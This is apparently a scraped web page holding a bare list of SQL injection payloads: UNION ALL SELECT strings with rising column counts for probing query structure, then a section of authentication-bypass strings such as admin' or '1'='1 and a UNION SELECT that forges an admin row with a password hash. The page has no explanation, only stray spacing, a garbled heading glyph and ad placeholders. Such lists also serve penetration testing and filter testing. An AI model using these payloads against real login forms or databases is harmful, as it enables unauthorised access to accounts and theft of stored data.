 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
 U   NION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30
 UNION ALL SELECT 'INJ'||'ECT'||'XXX'-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX'   ,2,3,4,5,6,7,8,9,10,11,12-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- <   br/> UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- 
 UNION ALL SELECT 'INJ'||'ECT'||'XXX'#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4#
 UNI   ON ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,   12,13,14,15,16,17,18,19#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#
 UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#

๐Ÿ”˜ SQL Injection Auth Bypass Payloads


'-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
or 1=1
or 1=1--
or 1=1#
or 1=1/*
admin' --
admin' #
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin'or 1=1 or ''='
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
admin') or ('1'='1'/*
admin') or '1'='1
admin') or '1'='1'--
admin') or '1'='1'#
admin') or '1'='1'/*
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed0   55
admin" --
admin" #
admin"/*
admin" or "1"="1
admin" or "1"="1"--
admin" or "1"="1"#
admin" or "1"="1"/*
admin"or 1=1 or ""="
admin" or 1=1
admin" or 1=1--
admin" or 1=1#
admin" or 1=1/*
admin") or ("1"="1
admin") or ("1"="1"--
admin") or ("1"="1"#
admin") or ("1"="1"/*
admin") or "1"="1
admin") or "1"="1"--
admin") or "1"="1"#
admin") or "1"="1"/*
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel